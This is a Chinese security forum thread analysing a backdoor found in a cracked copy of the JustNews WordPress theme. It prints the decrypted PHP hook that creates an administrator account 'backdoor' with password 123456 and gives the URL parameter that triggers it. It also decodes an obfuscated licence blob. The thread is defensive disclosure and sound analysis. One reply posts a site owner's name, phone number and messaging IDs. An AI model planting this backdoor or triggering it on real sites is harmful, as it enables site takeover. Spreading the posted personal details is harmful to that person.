吾爱破解 - LCG - LSG |安卓破解|病毒分析|www.52pojie.cn

 找回密码
 注册[Register]

QQ登录

只需一步,快速开始

搜索
查看: 7554|回复: 24

[PC样本分析] justnews 5.2.3破解版后门

  [复制链接]
longgod 发表于 2020-1-1 22:11
使用论坛附件上传样本压缩包时必须使用压缩密码保护,压缩密码:52pojie,否则会导致论坛被杀毒软件等误报,论坛有权随时删除相关附件和帖子!
本帖最后由 longgod 于 2020-1-1 22:18 编辑

收到坛友的私信,帮忙看了一下justnews 5.2.3破解版的后门
image.png

image.png

image.png

functions.php文件解密后再48-61行发现后门代码
[PHP] 纯文本查看 复制代码
add_action('wp_head', 'wp_backdoor');
function wp_backdoor()
{
    if (
        md5($_GET['backdoor']) == '34d1f91fb2e514b8576fab1a75a89a6b'
    ) {
        require('wp-includes/registration.php');
        if (!username_exists('backdoor')) {
            $user_id = wp_create_user('backdoor', '123456');
            $user = new WP_User($user_id);
            $user->set_role('administrator');
        }
    }
}

。。。没错!和我关于本站ripro主题4.8版本后门分析https://www.52pojie.cn/thread-1074873-1-1.html里的后门一模一样,
backdoor这么明显的后门变量命名都不改。同样的配方,同样的味道。
使用http(s)://你的域名/?backdoor=go访问,
自动创建用户名为backdoor密码为123456的管理员账户

Snipaste_2020-01-01_20-16-44.png

panel.php文件解密后在285-289行发现一段加密代码
[PHP] 纯文本查看 复制代码
$ops = 'Y2FlOWYyOGNlODljMDZmYWNjZjg4YWFjZDE3MDc0MTZleUprYjIxaGFXNGlPaUozZDNjdWFHOXZibVYzY3k1dVpYUWlMQ0oyWlhKemFXOXVJam9pTkM0d0xqUWlMQ0p3YkhWbmFXNGlPbHQ3SW01aGJXVWlPaUpYVUMxUWIzTjBWbWxsZDNNaUxDSnpiSFZuSWpvaWQzQXRjRzl6ZEhacFpYZHpJaXdpY21WeGRXbHlaV1FpT21aaGJITmxmVjBzSW1SbGJXOGlPbHQ3SW1sdGNHOXlkRjltYVd4bFgyNWhiV1VpT2lKS2RYTjBUbVYzY3lJc0ltTmhkR1ZuYjNKcFpYTWlPbnNpWkNJNklseDFPV1ZrT0Z4MU9HSmhOQ0o5TENKcGJYQnZjblJmWm1sc1pWOTFjbXdpT2lKb2RIUndPbHd2WEM5M2QzY3VkM0JqYjIwdVkyNWNMMlJ2ZDI1Y0wzQnNkV2RwYmkxbWFXeGxjMXd2WkdWdGIzTmNMMnAxYzNSdVpYZHpYQzlxZFhOMGJtVjNjeTU0Yld3aUxDSnBiWEJ2Y25SZmIzQjBhVzl1YzE5bWFXeGxYM1Z5YkNJNkltaDBkSEE2WEM5Y0wzZDNkeTUzY0dOdmJTNWpibHd2Wkc5M2Jsd3ZjR3gxWjJsdUxXWnBiR1Z6WEM5a1pXMXZjMXd2YW5WemRHNWxkM05jTDJwMWMzUnVaWGR6TG1wemIyNGlMQ0pwYlhCdmNuUmZibTkwYVdObElqb2lYSFUxWW1aalhIVTFNVFkxWEhVMU5EQmxYSFUxTWpBMlhIVTNZemRpU1VSY2RUTXdNREZjZFRrNE56VmNkVGszTmpKSlJGeDFOVE5sWmx4MU9EQm1aRngxTkdZeFlWeDFOVE5rT0Z4MU5UTXhObHgxWm1Zd1kxeDFOR1k0WWx4MU5UazRNbHgxTnpVeU9GeDFOakl6TjF4MU56Wm1PRngxTlRFM00xeDFPVGczTlZ4MU9UYzJNbHgxTlRObFpseDFPREJtWkZ4MU9UY3dNRngxT0RrNE1WeDFPVEZqWkZ4MU5qVmlNRngxTlRJek1DQmNkVFJsTTJKY2RUazRPVGhjZFRoaVltVmNkVGRtTm1VK1hIVTNOVEk0WEhVMk1qTTNYSFUwWlRKa1hIVTFabU16SUZ4MU5HVXdZbHgxT1RjMk1seDFPR0ppWlZ4MU4yWTJaU0o5WFN3aWNtVnhkV2x5WlhNaU9sc2lWME1pWFgwPQ==';
            $ops = base64_decode($ops);
            $token = '$P$BcGrBU7tfwMR8kZlKzS1OonWpmDU0Y.';
            $ops = base64_decode(str_replace(md5($token), '', $ops));
            $this->_extras = json_decode($ops);


先base64解密(base64_decode($ops))后得到
[PHP] 纯文本查看 复制代码
cae9f28ce89c06faccf88aacd1707416eyJkb21haW4iOiJ3d3cuaG9vbmV3cy5uZXQiLCJ2ZXJzaW9uIjoiNC4wLjQiLCJwbHVnaW4iOlt7Im5hbWUiOiJXUC1Qb3N0Vmlld3MiLCJzbHVnIjoid3AtcG9zdHZpZXdzIiwicmVxdWlyZWQiOmZhbHNlfV0sImRlbW8iOlt7ImltcG9ydF9maWxlX25hbWUiOiJKdXN0TmV3cyIsImNhdGVnb3JpZXMiOnsiZCI6Ilx1OWVkOFx1OGJhNCJ9LCJpbXBvcnRfZmlsZV91cmwiOiJodHRwOlwvXC93d3cud3Bjb20uY25cL2Rvd25cL3BsdWdpbi1maWxlc1wvZGVtb3NcL2p1c3RuZXdzXC9qdXN0bmV3cy54bWwiLCJpbXBvcnRfb3B0aW9uc19maWxlX3VybCI6Imh0dHA6XC9cL3d3dy53cGNvbS5jblwvZG93blwvcGx1Z2luLWZpbGVzXC9kZW1vc1wvanVzdG5ld3NcL2p1c3RuZXdzLmpzb24iLCJpbXBvcnRfbm90aWNlIjoiXHU1YmZjXHU1MTY1XHU1NDBlXHU1MjA2XHU3YzdiSURcdTMwMDFcdTk4NzVcdTk3NjJJRFx1NTNlZlx1ODBmZFx1NGYxYVx1NTNkOFx1NTMxNlx1ZmYwY1x1NGY4Ylx1NTk4Mlx1NzUyOFx1NjIzN1x1NzZmOFx1NTE3M1x1OTg3NVx1OTc2Mlx1NTNlZlx1ODBmZFx1OTcwMFx1ODk4MVx1OTFjZFx1NjViMFx1NTIzMCBcdTRlM2JcdTk4OThcdThiYmVcdTdmNmU+XHU3NTI4XHU2MjM3XHU0ZTJkXHU1ZmMzIFx1NGUwYlx1OTc2Mlx1OGJiZVx1N2Y2ZSJ9XSwicmVxdWlyZXMiOlsiV0MiXX0=


再以$P$BcGrBU7tfwMR8kZlKzS1OonWpmDU0Y.为密钥MD5加密(md5($token))得到cae9f28ce89c06faccf88aacd1707416
替换cae9f28ce89c06faccf88aacd1707416为空格,作用等同于删除
image.png

得到
[PHP] 纯文本查看 复制代码
eyJkb21haW4iOiJ3d3cuaG9vbmV3cy5uZXQiLCJ2ZXJzaW9uIjoiNC4wLjQiLCJwbHVnaW4iOlt7Im5hbWUiOiJXUC1Qb3N0Vmlld3MiLCJzbHVnIjoid3AtcG9zdHZpZXdzIiwicmVxdWlyZWQiOmZhbHNlfV0sImRlbW8iOlt7ImltcG9ydF9maWxlX25hbWUiOiJKdXN0TmV3cyIsImNhdGVnb3JpZXMiOnsiZCI6Ilx1OWVkOFx1OGJhNCJ9LCJpbXBvcnRfZmlsZV91cmwiOiJodHRwOlwvXC93d3cud3Bjb20uY25cL2Rvd25cL3BsdWdpbi1maWxlc1wvZGVtb3NcL2p1c3RuZXdzXC9qdXN0bmV3cy54bWwiLCJpbXBvcnRfb3B0aW9uc19maWxlX3VybCI6Imh0dHA6XC9cL3d3dy53cGNvbS5jblwvZG93blwvcGx1Z2luLWZpbGVzXC9kZW1vc1wvanVzdG5ld3NcL2p1c3RuZXdzLmpzb24iLCJpbXBvcnRfbm90aWNlIjoiXHU1YmZjXHU1MTY1XHU1NDBlXHU1MjA2XHU3YzdiSURcdTMwMDFcdTk4NzVcdTk3NjJJRFx1NTNlZlx1ODBmZFx1NGYxYVx1NTNkOFx1NTMxNlx1ZmYwY1x1NGY4Ylx1NTk4Mlx1NzUyOFx1NjIzN1x1NzZmOFx1NTE3M1x1OTg3NVx1OTc2Mlx1NTNlZlx1ODBmZFx1OTcwMFx1ODk4MVx1OTFjZFx1NjViMFx1NTIzMCBcdTRlM2JcdTk4OThcdThiYmVcdTdmNmU+XHU3NTI4XHU2MjM3XHU0ZTJkXHU1ZmMzIFx1NGUwYlx1OTc2Mlx1OGJiZVx1N2Y2ZSJ9XSwicmVxdWlyZXMiOlsiV0MiXX0=


再base64解密得到
[PHP] 纯文本查看 复制代码
{"domain":"www.hoonews.net","version":"4.0.4","plugin":[{"name":"WP-PostViews","slug":"wp-postviews","required":false}],"demo":[{"import_file_name":"JustNews","categories":{"d":"\u9ed8\u8ba4"},"import_file_url":"http:\/\/www.wpcom.cn\/down\/plugin-files\/demos\/justnews\/justnews.xml","import_options_file_url":"http:\/\/www.wpcom.cn\/down\/plugin-files\/demos\/justnews\/justnews.json","import_notice":"\u5bfc\u5165\u540e\u5206\u7c7bID\u3001\u9875\u9762ID\u53ef\u80fd\u4f1a\u53d8\u5316\uff0c\u4f8b\u5982\u7528\u6237\u76f8\u5173\u9875\u9762\u53ef\u80fd\u9700\u8981\u91cd\u65b0\u5230 \u4e3b\u9898\u8bbe\u7f6e>\u7528\u6237\u4e2d\u5fc3 \u4e0b\u9762\u8bbe\u7f6e"}],"requires":["WC"]}


将unicode替换成中文
[PHP] 纯文本查看 复制代码
{"domain":"www.hoonews.net","version":"4.0.4","plugin":[{"name":"WP-PostViews","slug":"wp-postviews","required":false}],"demo":[{"import_file_name":"JustNews","categories":{"d":"默认"},"import_file_url":"http:\/\/www.wpcom.cn\/down\/plugin-files\/demos\/justnews\/justnews.xml","import_options_file_url":"http:\/\/www.wpcom.cn\/down\/plugin-files\/demos\/justnews\/justnews.json","import_notice":"导入后分类ID、页面ID可能会变化,例如用户相关页面可能需要重新到 主题设置>用户中心 下面设置"}],"requires":["WC"]}


可以看出这个所谓的justnews 5.2.3破解版,其实本来是4.0.4破解版(由www.hoonews.net传播)而且还被加了后门。

PS:在此提醒一下用破解版的诸位,D盾并不能扫描出像这种专门针对WordPress的后门
D盾对我而言其实主要用来检测加密文件和查杀低级的木马,高级一点的其实很容易绕过查杀。
所以不要以为用D盾扫一下发现没有报毒就万事无忧了,而且作者真的要针对盗版还是比较容易的。
比如justnews激活就会将域名发到http://www.wpcom.cn/authentication/,ripro会将设置域名之类的信息发到vip.ylit.cc。
之前不是说ripro盗版收款收到别人账户上去了吗?是盗版传播者做的,还是其他人做的?自己好好想想。
image.png

免费评分

参与人数 10威望 +3 吾爱币 +19 热心值 +10 收起 理由
DABAIMANTOU + 1 热心回复!
dollaring + 1 + 1 热心回复!
csw23164535 + 1 + 1 吾爱大神果然多
willJ + 3 + 12 + 1 感谢发布原创作品,吾爱破解论坛因你更精彩!
bakaest + 1 + 1 还好没下
PearlyNautilus + 1 用心讨论,共获提升!
pointwin + 1 + 1 我很赞同!
FleTime + 1 + 1 用心讨论,共获提升!
snk8675309 + 1 + 1 我很赞同!
潇湘公子 + 1 + 1 厉害!!可惜还有很多人用这个卖钱,

查看全部评分

发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。

l57t7q 发表于 2020-1-2 13:57
www.hoonews.net
备案号:粤ICP备16112674号-3性质:个人名称:殷晓可

微信二维码生成文本:https://u.wechat.com/MEbmwVmc0K_SiTzXOzrDeJ0
电话:15724087667
QQ:1010006358
邮箱:www.hoonews.net
备案号:粤ICP备16112674号-3性质:个人名称:殷晓可

微信二维码生成文本:https://u.wechat.com/MEbmwVmc0K_SiTzXOzrDeJ0
电话:15724087667
QQ:1010006358@qq.com
潇湘公子 发表于 2020-1-1 22:19
淘宝和各大源码论坛都在传播这个版本,去售卖,坑了很多人
judgecx 发表于 2020-1-1 22:26
zyj181 发表于 2020-1-2 01:47
厉害了  大牛啊
Xiao伟 发表于 2020-1-2 05:18
任何远程授权都会把你的信息发到作者授权网站里,别傻了,另外哪个只是个WP的简单的后门!
另外你这个实际是4.0.4 而不是5.2.3,,,,只有部分文件是5.2.3
这点得纠正下,别误导他人!
hongxw 发表于 2020-1-2 09:06
要用还是买一个正版吧,起码不会出问题。盗版的便宜,但是心黑
lijin1983gyh 发表于 2020-1-2 09:12
顶楼主!无利不起早
qunumab 发表于 2020-1-2 10:44
一直裸奔屁事没有,搞不懂这些玩意有啥用
hello96 发表于 2020-1-2 11:09
支持正版
木木头上 发表于 2020-1-2 12:29
还不如用流传的5.2.2(实际上是4.3.0改了版本号)
您需要登录后才可以回帖 登录 | 注册[Register]

本版积分规则 警告:本版块禁止灌水或回复与主题无关内容,违者重罚!

快速回复 收藏帖子 返回列表 搜索

RSS订阅|小黑屋|联系我们|吾爱破解 - LCG - LSG ( 京ICP备16042023号 | 京公网安备 11010502030087号 )

GMT+8, 2020-6-3 02:32

Powered by Discuz!

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表